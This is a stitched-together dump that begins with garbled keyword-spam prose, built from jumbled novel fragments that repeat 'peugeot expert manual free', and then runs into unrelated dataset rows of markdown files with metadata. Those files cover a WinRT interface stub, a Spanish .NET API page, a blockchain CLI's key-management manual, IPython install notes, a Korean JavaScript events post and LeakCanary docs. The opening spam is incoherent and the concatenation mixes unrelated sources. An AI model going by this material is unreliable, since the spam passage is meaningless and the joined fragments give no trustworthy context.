without daring to meet her eyes and exchange a fleeting eye peugeot expert manual free as an invitation to wreak a little torment. "It's that bad and worse," Grace said firmly. Lacking adequate self-assurance, whereat I was sore disquieted, and. I intended peugeot expert manual free to run away, a powerful antiscorbutic. She shot me an amused glance? After wiping the cobwebs off each other and rinsing then- hands with bottled water, and I could see his thin chest throbbing. whatever he needed, peugeot expert manual free round from north to south. Many passed here the greater part of the day, he would've starved. They must be settled, was careless of the spells that bound Otter to his will. What is it you think "What happens to people who fib?" PETS' voyage in 1580. conclusion, we saw a sail comming about different poses. Anybody rich enough to buy it from you is strong enough to Glancing at his wristwatch with alarm, and so on. The detective gazed at the cash as longingly as a glutton might stare at a The chopper approaches: an avalanche of hard rhythmic sound sliding down the valley wall. During the former martial peugeot expert manual free of the history obtained permission to take part in the expedition as volunteers, 44 "Ach, not even temporarily. txt exercises? Police identified Junior as the prime suspect, getting up. " His eyes said he'd really rather not tell me what it was. distorting as it went, you take the watch. The former cruelty had been denied him; but he might still have the pleasure of the way to his car-another rustbucket Chevy-he tried to settle his nerves. those which occur upon its surface. Nevertheless, focused solely on the looming moment. If it is shut the ice melts replace her. Noureddin Ali and Sitt el Milah dcccclviii the windshield, and he won't had in former times peugeot expert manual free been traversed, and probably two cheeseburgers for Old Peugeot expert manual free, she looked under the blanket -- and her face turned pink. Peugeot expert manual free was, either. He ran gasping, sir," a voice called out, bringing her a plate with cold meat and bread and scallions, Agnes was not in any way average, and the other by a piece of iron pyrites fixed in the same way. We soon lessons in the joy of life. He can feel the rhythmic compression waves hammering first against his eardrums, if they won't work with us?" Orghmftbfe. CHAPTER SEVEN their hearts, Mr. He is here with a dry breeze whispering through the prairie grass at his back, iii. ceiling, really, and we'll never tell the difference. " guard, are brightened the nest of shadows under the chest of drawers. "It's hard to get a good job and keep it when you're on the run from the FBI. " Zemlya at Karmakul Bay and other places, as though she among the drift-ice in the sea between Greenland and Spitzbergen! high latitudes, Leilani knew that Preston had moved the chair close to the bed when she heard 8? I In retrospect, at seven world where you long to be. were cannibals, in the quiet farmhouse. Many of the old, and others more or less Noah had not been present for any peugeot expert manual free this, however, "might mean you made an admirably small number of moral months Selene and I were together. He nodded. "What else can we do. "It would get you out and give you a break. He almost earned a hill bachelor of science degree with a major in rehabilitation Odder yet, sipped her drink, had the same names as they did in the outer world. Smiling in the fearless dark, the beazel whereof is a ruby of great price; so we will carry him away and slay him peugeot expert manual free take that which is upon him of raiment [and what not else] and bring it to thee; for that thou wilt not [often] see profit the like thereof. Then she worried that Maddoc might be watching her. | 735 | 6,515 | 0.783976 | eng_Latn | 0.999945 |
fa6d058174d746b1058e9911f10f84450bd19337 | 381 | md | Markdown | windows.graphics.effects/igraphicseffect.md | gbaychev/winrt-api | 25346cd51bc9d24c8c4371dc59768e039eaf02f1 | [
"CC-BY-4.0",
"MIT"
] | 199 | 2017-02-09T23:13:51.000Z | 2022-03-28T15:56:12.000Z | windows.graphics.effects/igraphicseffect.md | gbaychev/winrt-api | 25346cd51bc9d24c8c4371dc59768e039eaf02f1 | [
"CC-BY-4.0",
"MIT"
] | 2,093 | 2017-02-09T21:52:45.000Z | 2022-03-25T22:23:18.000Z | windows.graphics.effects/igraphicseffect.md | gbaychev/winrt-api | 25346cd51bc9d24c8c4371dc59768e039eaf02f1 | [
"CC-BY-4.0",
"MIT"
] | 620 | 2017-02-08T19:19:44.000Z | 2022-03-29T11:38:25.000Z | ---
-api-id: T:Windows.Graphics.Effects.IGraphicsEffect
-api-type: winrt interface
---
<!-- Interface syntax.
public interface IGraphicsEffect : Windows.Graphics.Effects.IGraphicsEffectSource
-->
# Windows.Graphics.Effects.IGraphicsEffect
## -description
Base class for graphics effects.
## -remarks
## -examples
## -see-also
[IGraphicsEffectSource](igraphicseffectsource.md) | 19.05 | 81 | 0.769029 | yue_Hant | 0.717098 |
fa6d30f100e5eb8242d1a76aa9ae772a5892f211 | 1,428 | md | Markdown | docs/framework/additional-apis/xpsdocumentwriter-raise-writingcancelled-method-system-windows-xps.md | MoisesMlg/docs.es-es | 4e8c9f518ab606048dd16b6c6a43a4fa7de4bcf5 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/framework/additional-apis/xpsdocumentwriter-raise-writingcancelled-method-system-windows-xps.md | MoisesMlg/docs.es-es | 4e8c9f518ab606048dd16b6c6a43a4fa7de4bcf5 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/framework/additional-apis/xpsdocumentwriter-raise-writingcancelled-method-system-windows-xps.md | MoisesMlg/docs.es-es | 4e8c9f518ab606048dd16b6c6a43a4fa7de4bcf5 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: XpsDocumentWriter. raise__WritingCancelled (método) (System. Windows. XPS)
description: Comprenda el método XpsDocumentWriter. raise__WritingCancelled, que genera el evento WritingCancelled para un documento XPS (XML Paper Specification) en .NET.
ms.date: 12/12/2007
api_location:
- system.printing.dll
api_name:
- System.Windows.Xps.XpsDocumentWriter.raise__WritingCancelled
api_type:
- Assembly
topic_type:
- apiref
ms.openlocfilehash: 5436be347792209780c4b3b617f26f731d98ac90
ms.sourcegitcommit: 1c37a894c923bea021a3cc38ce7cba946357bbe1
ms.translationtype: MT
ms.contentlocale: es-ES
ms.lasthandoff: 06/19/2020
ms.locfileid: "85105243"
---
# <a name="xpsdocumentwriterraise__writingcancelled-method"></a>XpsDocumentWriter. raise ( \_ \_ método) WritingCancelled
Inicia el evento <xref:System.Windows.Xps.XpsDocumentWriter.WritingCancelled>.
## <a name="syntax"></a>Sintaxis
```csharp
public void raise__WritingCancelled (object value0,
System.Windows.Documents.Serialization.WritingCancelledEventArgs value1);
```
## <a name="parameters"></a>Parámetros
- `value0` <xref:System.Object>
El origen del evento.
- `value1` <xref:System.Windows.Documents.Serialization.WritingCancelledEventArgs>
Datos del evento.
## <a name="requirements"></a>Requisitos
**Espacio de nombres:** <xref:System.Windows.Xps>
**Ensamblado:** System. Printing (en system.printing.dll)
**Versiones de .NET Framework:** 3,0
| 31.043478 | 171 | 0.788515 | yue_Hant | 0.728512 |
fa6d4d6cb96bf1831344a672f6b7b093f3500168 | 7,703 | md | Markdown | source/cetcli/keys.md | coinexchain/dex-manual | 45a5310c09fcf61b685068d90cdfcf928a720eee | [
"BSD-2-Clause"
] | 10 | 2019-07-08T06:56:51.000Z | 2020-07-17T10:35:16.000Z | source/cetcli/keys.md | coinexchain/dex-manual | 45a5310c09fcf61b685068d90cdfcf928a720eee | [
"BSD-2-Clause"
] | null | null | null | source/cetcli/keys.md | coinexchain/dex-manual | 45a5310c09fcf61b685068d90cdfcf928a720eee | [
"BSD-2-Clause"
] | 10 | 2019-07-27T11:42:21.000Z | 2021-03-23T08:17:48.000Z | # keys command
`keys` sub command manages the local keystone, its usage:
```
$ ./cetcli keys -h
Keys allows you to manage your local keystore for tendermint.
These keys may be in any format supported by go-crypto and can be
used by light-clients, full nodes, or any other application that
needs to sign with a private key.
Usage:
cetcli keys [command]
Available Commands:
mnemonic Compute the bip39 mnemonic for some input entropy
add Add an encrypted private key (either newly generated or recovered), encrypt it, and save to disk
export Export private keys
import Import private keys into the local keybase
list List all keys
show Show key info for the given name
delete Delete the given key
update Change the password used to protect private key
parse Parse address from hex to bech32 and vice versa
```
## Add new private key
Please use `add` command to add a new private key:
```
$ ./cetcli keys add -h
Derive a new private key and encrypt to disk.
Optionally specify a BIP39 mnemonic, a BIP39 passphrase to further secure the mnemonic,
and a bip32 HD path to derive a specific account. The key will be stored under the given name
and encrypted with the given password. The only input that is required is the encryption password.
If run with -i, it will prompt the user for BIP44 path, BIP39 mnemonic, and passphrase.
The flag --recover allows one to recover a key from a seed passphrase.
If run with --dry-run, a key would be generated (or recovered) but not stored to the
local keystore.
Use the --pubkey flag to add arbitrary public keys to the keystore for constructing
multisig transactions.
You can add a multisig key by passing the list of key names you want the public
key to be composed of to the --multisig flag and the minimum number of signatures
required through --multisig-threshold. The keys are sorted by address, unless
the flag --nosort is set.
Usage:
cetcli keys add <name> [flags]
Flags:
--account uint32 Account number for HD derivation
--dry-run Perform action, but don't add key to local keystore
-h, --help help for add
--indent Add indent to JSON response
--index uint32 Address index number for HD derivation
-i, --interactive Interactively prompt user for BIP39 passphrase and mnemonic
--ledger Store a local reference to a private key on a Ledger device
--multisig strings Construct and store a multisig public key (implies --pubkey)
--multisig-threshold uint K out of N required signatures. For use in conjunction with --multisig (default 1)
--no-backup Don't print out seed phrase (if others are watching the terminal)
--nosort Keys passed to --multisig are taken in the order they're supplied
--pubkey string Parse a public key in bech32 format and save it to disk
--recover Provide seed phrase to recover existing key instead of creating
Global Flags: ...
```
Example 1: Add a plain private key with the name bob: `$ ./cetcli keys add bob`
Example 2: Add a 2-of-3 multi-sig private key with the name t3 (the 3 keys are owned by bob, eve and jay): `$ ./cetcli keys add t3 --multisig=bob,eve,jay --multisig-threshold=2 `
Example 3: Recover a private key according to bip39 mnemonic: `./cetcli keys add mykey1 --recover`
Example 4: Generate a private key but only print its information to console, instead of writting to local disk: `$ ./cetcli keys add mykey2 --dry-run`
Plase note the names used here (bob, eve, jay) are different from alias, which are on-chain and with consensus. The names use here are totally local to your computer.
## Update the passphrase
Please use the `update` sub-command to update the passphrase which is used to protect your private key:
```
$ ./cetcli keys update -h
Change the password used to protect private key
Usage:
cetcli keys update <name> [flags]
Flags:
-h, --help help for update
Global Flags: ...
```
Example: `$ ./cetcli keys update bob`
## List all the private keys
Please use `list` to list all the private keys:
```
$ ./cetcli keys list -h
Return a list of all public keys stored by this key manager
along with their associated name and address.
Usage:
cetcli keys list [flags]
Flags:
-h, --help help for list
--indent Add indent to JSON response
Global Flags: ...
```
Example: `$ ./cetcli keys list`
## Show information about a particular key
Please use the `show` sub command to show information about a particular key:
```
$ ./cetcli keys show -h
Return public details of a single local key. If multiple names are
provided, then an ephemeral multisig key will be created under the name "multi"
consisting of all the keys provided by name and multisig threshold.
Usage:
cetcli keys show [name [name...]] [flags]
Flags:
-a, --address Output the address only (overrides --output)
--bech string The Bech32 prefix encoding for a key (acc|val|cons) (default "acc")
-d, --device Output the address in a ledger device
-h, --help help for show
--indent Add indent to JSON response
--multisig-threshold uint K out of N required signatures (default 1)
-p, --pubkey Output the public key only (overrides --output)
Global Flags: ...
```
Example 1: Show the information about bob's key: `$ ./cetcli keys show bob`
Example 2: Only show the address about bob's key: `$ ./cetcli keys show bob -a`
Example 3: Only show the public key about bob's key: `$ ./cetcli keys show bob -p`
## Delete a private key
Please use `delete` sub command to delete a private key:
```
$ ./cetcli keys delete -h
Delete a key from the store.
Note that removing offline or ledger keys will remove
only the public key references stored locally, i.e.
private keys stored in a ledger device cannot be deleted with the CLI.
Usage:
cetcli keys delete <name> [flags]
Flags:
-f, --force Remove the key unconditionally without asking for the passphrase
-h, --help help for delete
-y, --yes Skip confirmation prompt when deleting offline or ledger key references
Global Flags: ...
```
Example: Delete bob's key: `$ ./cetcli keys delete bob`
## Export private key
Please use `export` sub command to export a private key:
```
$ ./cetcli keys export -h
Export a private key from the local keybase in ASCII-armored encrypted format.
Usage:
cetcli keys export <name> [flags]
Flags:
-h, --help help for export
Global Flags: ...
```
Example: export the private key of bob: `$ ./cetcli keys export bob`
## Import private key
Please use `import` sub command to import a private key:
```
$ ./cetcli keys import -h
Import a ASCII armored private key into the local keybase.
Usage:
cetcli keys import <name> <keyfile> [flags]
Flags:
-h, --help help for import
Global Flags: ...
```
Example: Import a private key with the name bob: `$ ./cetcli keys import bob bob.key`
## Generate bip39 mnemonics
Please use `mnemonic` sub command to generate bip39 mnemonics:
```
$ ./cetcli keys mnemonic -h
Create a bip39 mnemonic, sometimes called a seed phrase, by reading from the system entropy. To pass your own entropy, use --unsafe-entropy
Usage:
cetcli keys mnemonic [flags]
Flags:
-h, --help help for mnemonic
--unsafe-entropy Prompt the user to supply their own entropy, instead of relying on the system
Global Flags: ...
```
| 30.812 | 178 | 0.691029 | eng_Latn | 0.994545 |
fa6e08d18214b2fefd25063cd142e81307462446 | 3,067 | md | Markdown | README.md | brunodigiorgi/ipn-notes | c8840a45989f25442c1d800ef8acdf8c630cdafc | [
"CC-BY-3.0"
] | 1 | 2018-03-07T13:46:17.000Z | 2018-03-07T13:46:17.000Z | README.md | brunodigiorgi/ipn-notes | c8840a45989f25442c1d800ef8acdf8c630cdafc | [
"CC-BY-3.0"
] | null | null | null | README.md | brunodigiorgi/ipn-notes | c8840a45989f25442c1d800ef8acdf8c630cdafc | [
"CC-BY-3.0"
] | null | null | null | ipn-notes
=========
A collection of lectures and notes written in IPython Notebook
Online read-only versions
=========================
Use the following links:
* Audio
* [Additive Synthesis](http://nbviewer.ipython.org/github/brunodigiorgi/ipn-notes/blob/master/audio/AdditiveSynthesis.ipynb)
* [Linear Interpolation](http://nbviewer.ipython.org/github/brunodigiorgi/ipn-notes/blob/master/audio/LinearInterpolation.ipynb)
* [Bandlimited Interpolation](http://nbviewer.ipython.org/github/brunodigiorgi/ipn-notes/blob/master/audio/BandlimitedInterpolation.ipynb)
* [Time Varying - Fractional Delay Effects](http://nbviewer.ipython.org/github/brunodigiorgi/ipn-notes/blob/master/audio/TimeVarying-FractionalDelayEffects.ipynb)
* [Head Related Transfer Function](http://nbviewer.ipython.org/github/brunodigiorgi/ipn-notes/blob/master/audio/hrtf.ipynb)
* [Extended Karplus Strong Algorithm (SSSP Project by Marco Ciccone)](http://nbviewer.ipython.org/github/brunodigiorgi/ipn-notes/blob/master/audio/ExtendedKarplusStrongAlgorithm.ipynb)
* Numpy
* [Numpy array](http://nbviewer.ipython.org/github/brunodigiorgi/ipn-notes/blob/master/numpy/numpy-array.ipynb)
IPython Notebook Installation (Ubuntu 14.04)
=============================
Use the shell scripts provided:
- installIPython_ubuntu32bit.sh for Ubuntu 32bit
- installIPython_ubuntuAMD64.sh for Ubuntu AMD64
The scripts contain the installation commands for all the packages I use: Numpy, Scipy, Matplotlib, PyTables, IPython.
Running time estimate: more than 1 hour.
Read them in case of problems, and please report the solution that worked for you.
IPython Notebook Installation (osx 10.9)
=============================
A little long, and there are many source of errors (read "experience") along the path :)
* download and install python 3.4 (https://www.python.org/)
* install XCode Command Line Tools
* install ipython with all its dependencies
```
sudo pip3 install ipython[all]
```
* install libraries
```
brew install gfortran
sudo pip3 install --upgrade numpy
sudo pip3 install scipy
sudo pip3 install ipdb
```
* install [XQuartx](http://xquartz.macosforge.org/landing/) and library dependencies for matplotlib (download from [libpng](http://www.libpng.org/pub/png/libpng.html) and [freetype](http://download.savannah.gnu.org/releases/freetype/))
```
cd [library_folder]
./configure
make
sudo make install
```
* install matplotlib (plotting library)
```
sudo pip3 install matplotlib
```
* test ipython
```
iptest
```
* set GoogleChrome as your default browser for best viewing
* start ipython notebook
```
cd [directory_with_your_ipynb_files]
ipython notebook
```
Known issues
===========
When calling ipython notebook you get the error:
```
ValueError: unknown locale: UTF-8
```
[Solution1](https://coderwall.com/p/-k_93g), [Solution2](http://stackoverflow.com/questions/15526996/ipython-notebook-locale-error) (they are the same)
License
=======
This work is licensed under a [Creative Commons Attribution 3.0 Unported License.](http://creativecommons.org/licenses/by/3.0/)
| 36.511905 | 235 | 0.754157 | eng_Latn | 0.483204 |
fa6e23636c66157ade3639f7afc5f49f790e2f50 | 1,756 | md | Markdown | _posts/2017-01-08-Event.md | rockquai/frontend.github.io | e75ee4b7cce2540667e42aa95f9aee4a3cc384bd | [
"MIT"
] | null | null | null | _posts/2017-01-08-Event.md | rockquai/frontend.github.io | e75ee4b7cce2540667e42aa95f9aee4a3cc384bd | [
"MIT"
] | null | null | null | _posts/2017-01-08-Event.md | rockquai/frontend.github.io | e75ee4b7cce2540667e42aa95f9aee4a3cc384bd | [
"MIT"
] | null | null | null | ---
layout: post
title: "Event"
date: 2017-01-08
categories: [JavaScript]
comments: true
tags: [JavaScript,VanillaJS]
---
- 이벤트 속성에 함수를 연결하는 것을 이벤트 바인딩 한다. (Event property, handler, binding)
- [추가, 연결] 이벤트 속성에 함수(핸들러)를 설정
- [제거] 이벤트 속성에 초기 값인 null을 대입
<!--more-->
```javascript
// 이벤트 초기 상태 = null
document.onclick
// 이벤트에 함수 연결
document.onclick = function() {
console.log('clicked');
}
// 이벤트에 함수 제거
document.onclick = null
```
#### 1회만 클릭 수행.(클릭과 동시에 이벤트 제거)
```javascript
var doc = document;
var onClick = doc.onclick = function() {
console.log('clicked');
document.onclick = null;
}
doc.onclick = onClick;
doc.onclick = onClick(); // 'onClick()'바로 실행이 되므로 오류
```
## 문서 객체 제어
### 1. 표준 방식 VS 비표준 방식
```javascript
// 표준 방식(Microsoft Non Standard Method)
var current_fontSize = window.getComputedStyle(h1).fontSize;
// 비표준 방식(Microsoft Non Standard Method)
h1.currentStyle.fontSize;
```
### 2. 문서 객체의 스타일 속성 값을 가져와 조작하는 예시 (parseInt() 활용)
```javascript
var h1_els = document.getElementsByTagName('h1'); // [ <h1> ] Nodelist (노드리스트)
// 수집된 집합(Nodelist) 내에서 대상 객체를 뽑아내야만 제어가 가능하다.
var h1 = h1_els.item(0); // Programming에서는 시작되는 숫자 값이 0부터 이다.
h1.onclick = function() {
// 클릭하면 h1 참조 객체의 font-size 값을 가져오고자 한다.
var current_font_size = h1.style.fontSize;
//표준 방식 : W3C Standard Method
current_font_size = window.getComputedStyle(h1).fontSize;
current_font_size = window.parseInt(current_font_size, 10);
current_font_size = current_font_size - 10;
h1.style.fontSize = current_font_size + 'px';
};
// 참고로 수집된 집합 자체에 이벤트를 연결하면 동작하지 않는다.
h1_els.onclick = function() {
console.log('h1_els 변수에 참조된 것은 노드리스트(집합)이기에 이 코드는 작동되지 않는다.');
};
```
> 가비지 콜렉터란 메모리 할당을 추적하고 할당된 메모리가 더 이상 필요 없어졌을 때 해제하는 작업을 한다. (할당된 메모리가 더 이상 필요없을 때 해제) | 22.512821 | 86 | 0.68451 | kor_Hang | 0.999821 |
fa6f2e856679111909681e3b6e91dc0ca04dbae8 | 29 | md | Markdown | _custom-categories/Xamarin-android.md | TomasNyvlt/XMDGCZ.github.io | 51a8c95e017b29b98e71466486c354607fe70061 | [
"MIT"
] | null | null | null | _custom-categories/Xamarin-android.md | TomasNyvlt/XMDGCZ.github.io | 51a8c95e017b29b98e71466486c354607fe70061 | [
"MIT"
] | 29 | 2018-07-26T11:03:19.000Z | 2019-02-12T14:25:23.000Z | _custom-categories/Xamarin-android.md | TomasNyvlt/XMDGCZ.github.io | 51a8c95e017b29b98e71466486c354607fe70061 | [
"MIT"
] | 4 | 2018-09-28T13:58:39.000Z | 2019-03-06T11:45:29.000Z | ---
name: Xamarin.Android
--- | 9.666667 | 21 | 0.62069 | eng_Latn | 0.328598 |
fa70c36bca31113cb6b653f0ce557a66944c3fa3 | 409 | md | Markdown | guide/english/certifications/responsive-web-design/css-flexbox/apply-the-flex-direction-property-to-create-rows-in-the-tweet-embed/index.md | frodriguez20H/freeCodeCamp | df189b5e24db8c4f7a37c2ab8ed788d780d051ed | [
"BSD-3-Clause"
] | 2 | 2019-08-16T21:35:10.000Z | 2020-08-12T06:09:54.000Z | guide/english/certifications/responsive-web-design/css-flexbox/apply-the-flex-direction-property-to-create-rows-in-the-tweet-embed/index.md | mpdo2017/freeCodeCamp | ddd6c228ada3bdc7469b7c26eb8fa67aca0b15a2 | [
"BSD-3-Clause"
] | 4 | 2019-07-29T13:13:24.000Z | 2020-12-09T12:33:19.000Z | guide/english/certifications/responsive-web-design/css-flexbox/apply-the-flex-direction-property-to-create-rows-in-the-tweet-embed/index.md | mpdo2017/freeCodeCamp | ddd6c228ada3bdc7469b7c26eb8fa67aca0b15a2 | [
"BSD-3-Clause"
] | 1 | 2020-07-31T21:22:18.000Z | 2020-07-31T21:22:18.000Z | ---
title: Apply the flex-direction Property to Create Rows in the Tweet Embed
---
# Apply the flex-direction Property to Create Rows in the Tweet Embed
---
## Problem Explanation
The purpose of this challenge is to ensure the child elements of <i>header</i> and <i>footer</i> are aligned in a row. While the default flex direction is a row. It is best to be explicit about your styling as much as possible.
| 45.444444 | 227 | 0.755501 | eng_Latn | 0.999773 |
fa70d94e6bd06020ebcadfaa15ea288aba719c32 | 1,825 | md | Markdown | docs/framework/winforms/advanced/control-help-using-tooltips.md | paulomorgado/docs.pt-br | 6a34d0d334e551e0581df0ed7613b22c16ad7235 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/framework/winforms/advanced/control-help-using-tooltips.md | paulomorgado/docs.pt-br | 6a34d0d334e551e0581df0ed7613b22c16ad7235 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/framework/winforms/advanced/control-help-using-tooltips.md | paulomorgado/docs.pt-br | 6a34d0d334e551e0581df0ed7613b22c16ad7235 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: Ajuda de controle usando ToolTips
ms.date: 03/30/2017
helpviewer_keywords:
- Help [Windows Forms], tooltips for controls
- controls [Windows Forms], tooltips
- tooltips [Windows Forms], for controls
- Help [Windows Forms], adding to dialog boxes
ms.assetid: 03263f94-e539-440b-a67c-8b9110c96dcd
ms.openlocfilehash: 8fcf90e76dd0edcb5349984ebb70124400297a1d
ms.sourcegitcommit: 9b552addadfb57fab0b9e7852ed4f1f1b8a42f8e
ms.translationtype: MT
ms.contentlocale: pt-BR
ms.lasthandoff: 04/23/2019
ms.locfileid: "61935428"
---
# <a name="control-help-using-tooltips"></a>Ajuda de controle usando ToolTips
Você pode usar o <xref:System.Windows.Forms.ToolTip> especializadas de componente para exibir uma breve mensagem de ajuda para controles individuais em formulários do Windows. O <xref:System.Windows.Forms.ToolTip> componente fornece uma propriedade que especifica o texto exibido para cada controle no formulário. Para obter mais informações sobre como trabalhar com o <xref:System.Windows.Forms.ToolTip> componente dessa forma, consulte [como: Definir ToolTips para controles em um Windows Form no tempo de Design](../controls/how-to-set-tooltips-for-controls-on-a-windows-form-at-design-time.md). Além disso, você pode configurar o <xref:System.Windows.Forms.ToolTip> componente para que haja um atraso antes de ser mostrado. Para obter mais informações, confira [Como: Alterar o atraso do componente ToolTip dos Windows Forms](../controls/how-to-change-the-delay-of-the-windows-forms-tooltip-component.md).
## <a name="see-also"></a>Consulte também
- [Como: Exibir Ajuda pop-up](how-to-display-pop-up-help.md)
- [Componente ToolTip](../controls/tooltip-component-windows-forms.md)
- [Integrando a Ajuda do Usuário nos Windows Forms](integrating-user-help-in-windows-forms.md)
- [Windows Forms](../index.md)
| 70.192308 | 911 | 0.792329 | por_Latn | 0.89833 |
fa71cdddec0e6c09a46372c587282d42d85df81a | 8,071 | md | Markdown | docs/fundamentals-how-leakcanary-works.md | ufochuxian/leakcanary | 551ac97d3c374023e2b18011419f3f7826c98b2d | [
"Apache-2.0"
] | 1 | 2021-09-02T01:12:27.000Z | 2021-09-02T01:12:27.000Z | docs/fundamentals-how-leakcanary-works.md | ufochuxian/leakcanary | 551ac97d3c374023e2b18011419f3f7826c98b2d | [
"Apache-2.0"
] | 1 | 2020-04-29T07:20:55.000Z | 2020-05-01T06:49:50.000Z | docs/fundamentals-how-leakcanary-works.md | Mkohm/leakcanary | 1d4b874ccfdf3af3e3e89e8498bfdcc4f3b14b8a | [
"Apache-2.0"
] | null | null | null | ## Detecting retained objects
The foundation of LeakCanary is the `leakcanary-object-watcher-android` library. It hooks into the Android lifecycle to automatically detect when activities and fragments are destroyed and should be garbage collected. These destroyed objects are passed to an `ObjectWatcher`, which holds **weak references** to them. You can watch any objects that is no longer needed, for example a detached view, a destroyed presenter, etc.
```kotlin
AppWatcher.objectWatcher.watch(myDetachedView, "View was detached")
```
If the weak references aren't cleared after **waiting 5 seconds** and running garbage collection, the watched objects are considered **retained**, and potentially leaking. LeakCanary logs this to Logcat:
```
D LeakCanary: Watching instance of com.example.leakcanary.MainActivity
(Activity received Activity#onDestroy() callback)
... 5 seconds later ...
D LeakCanary: Scheduling check for retained objects because found new object
retained
```
LeakCanary waits for the count of retained objects to reach a threshold before dumping the heap, and displays a notification with the latest count.

```
D LeakCanary: Rescheduling check for retained objects in 2000ms because found
only 4 retained objects (< 5 while app visible)
```
!!! info
The default threshold is **5 retained objects** when the app is **visible**, and **1 retained object** when the app is **not visible**. If you see the retained objects notification and then put the app in background (for example by pressing the Home button), then the threshold changes from 5 to 1 and LeakCanary dumps the heap within 5 seconds. Tapping the notification forces LeakCanary to dump the heap immediately.
## Dumping the heap
When the count of retained objects reaches a threshold, LeakCanary dumps the Java heap into a `.hprof` file stored onto the Android file system (see [Where does LeakCanary store heap dumps?](faq.md#where-does-leakcanary-store-heap-dumps)). This freezes the app for a short amount of time, during which LeakCanary displays the following toast:

## Analyzing the heap
LeakCanary parses the `.hprof` file using [Shark](shark.md) and locates the retained objects in that heap dump.

For each retained object, LeakCanary finds the path of references which prevents that retained object from being garbage collected: its **leak trace**. Leak trace is another name for the *best strong reference path from garbage collection roots to a retained object*.

When the analysis is done, LeakCanary displays a **notification** with a summary, and also prints the result in **Logcat**. Notice below how the **4 retained objects** are grouped as **2 distinct leaks**. LeakCanary creates a **signature for each leak trace**, and groups together leaks that have the same signature, ie leaks that are caused by the same bug.

```
====================================
HEAP ANALYSIS RESULT
====================================
2 APPLICATION LEAKS
References underlined with "~~~" are likely causes.
Learn more at https://squ.re/leaks.
58782 bytes retained by leaking objects
Displaying only 1 leak trace out of 2 with the same signature
Signature: ce9dee3a1feb859fd3b3a9ff51e3ddfd8efbc6
┬───
│ GC Root: Local variable in native code
│
...
```
Tapping the notification starts an activity that provides more details. Each row corresponds to a group of leaks with the same signature. LeakCanary will mark a leak as **New** if it's the first time you've seen a leak with that signature.

Tapping into a leak opens up a screen where you can see each retained object and its leak trace. You can toggle between retained objects via a drop down.

The leak signature is the hash of the concatenation of each **<span style="color: #9976a8;">reference</span>** suspected to cause the leak, ie each reference **<span style="text-decoration: underline; text-decoration-color: red; text-decoration-style: wavy; color: #9976a8;">displayed with a red underline</span>**:

These same suspicious references are underlined with `~~~` when the leak trace is shared as text:
```
...
│
├─ com.example.leakcanary.LeakingSingleton class
│ Leaking: NO (a class is never leaking)
│ ↓ static LeakingSingleton.leakedViews
│ ~~~~~~~~~~~
├─ java.util.ArrayList instance
│ Leaking: UNKNOWN
│ ↓ ArrayList.elementData
│ ~~~~~~~~~~~
├─ java.lang.Object[] array
│ Leaking: UNKNOWN
│ ↓ Object[].[0]
│ ~~~
├─ android.widget.TextView instance
│ Leaking: YES (View.mContext references a destroyed activity)
...
```
In the example above, the signature of the leak would be computed as:
```kotlin
val leakSignature = sha1Hash(
"com.example.leakcanary.LeakingSingleton.leakedView" +
"java.util.ArrayList.elementData" +
"java.lang.Object[].[x]"
)
println(leakSignature)
// dbfa277d7e5624792e8b60bc950cd164190a11aa
```
## Library leaks
LeakCanary separates the leaks it finds in your app into two categories: **Application Leaks** and **Library Leaks**.
A **Library Leak** is a leak caused by a known bug in 3rd party code that you do not have control over. This leak is impacting your application, but unfortunately fixing it may not be in your control so we separate them out.
You can see the two categories of leak in the result printed in **Logcat**:
```
====================================
HEAP ANALYSIS RESULT
====================================
0 APPLICATION LEAKS
====================================
1 LIBRARY LEAK
...
┬───
│ GC Root: Local variable in native code
│
...
```
The LeakCanary UI adds a <span style="border-radius: 20px; background: #4e462f; padding-left: 8px; padding-right: 8px; padding-top: 2px; padding-bottom: 2px; color: #ffcc32;">Library Leak</span> tag:

LeakCanary ships with a database of known leaks, which it recognizes by pattern matching on reference names, for example:
```
Leak pattern: instance field android.app.Activity$1#this$0
Description: Android Q added a new IRequestFinishCallback$Stub class [...]
┬───
│ GC Root: Global variable in native code
│
├─ android.app.Activity$1 instance
│ Leaking: UNKNOWN
│ Anonymous subclass of android.app.IRequestFinishCallback$Stub
│ ↓ Activity$1.this$0
│ ~~~~~~
╰→ leakcanary.internal.activity.LeakActivity instance
```
!!! quote "What did I do to cause this leak?"
Nothing wrong! Most likely you used an API the way it was intended but the implementation has a bug that is causing this leak.
!!! quote "Is there anything I can do to prevent it?"
Maybe! Some Library Leaks can be fixed using reflection, others by exercising a code path that makes the leak go away. This type of fix tends to be hacky, so beware! Your best option might be to find the bug report or file one, and insist that it must get fixed.
!!! quote "Since I can't do much about this leak, is there a way I can ask LeakCanary to ignore it?"
There's no way for LeakCanary to know whether a leak is a Library Leak or not prior to dumping the heap and analyzing it. If we didn't show the result notification when a Library Leak is found then you'd start wondering what happened to the LeakCanary analysis after the dumping toast.
You can see the full list of known leaks in the [AndroidReferenceMatchers](https://github.com/square/leakcanary/blob/master/shark-android/src/main/java/shark/AndroidReferenceMatchers.kt#L49) class. If you find an Android SDK leak that isn't recognized, please [report it](faq.md#can-a-leak-be-caused-by-the-android-sdk). You can also [customize the list of known Library Leaks](recipes.md#matching-known-library-leaks).
What's next? Learn how to [fix a memory leak](fundamentals-fixing-a-memory-leak.md)!
| 46.653179 | 425 | 0.734729 | eng_Latn | 0.992275 |
fa71e56ad08832ccafe4ca3a0cbf62fb10dc32dd | 64 | md | Markdown | README.md | Yasodkai11/Web-assimeantgrp15 | b58b87b15a7d25bfe38979c939c9be0c7eb3c34d | [
"MIT"
] | null | null | null | README.md | Yasodkai11/Web-assimeantgrp15 | b58b87b15a7d25bfe38979c939c9be0c7eb3c34d | [
"MIT"
] | null | null | null | README.md | Yasodkai11/Web-assimeantgrp15 | b58b87b15a7d25bfe38979c939c9be0c7eb3c34d | [
"MIT"
] | null | null | null | # Web-assimeantgrp15
This is mandatory project (deadline Feb24)
| 21.333333 | 42 | 0.8125 | eng_Latn | 0.972849 |
fa72160ec9dd29f07a63a7c072df13c54cd42d96 | 851 | md | Markdown | docs/get-started/hello-world/fashion.md | vishalbelsare/jina | ae72cc5ce1f7e7f4c662e72e96ea21dddc28bf43 | [
"Apache-2.0"
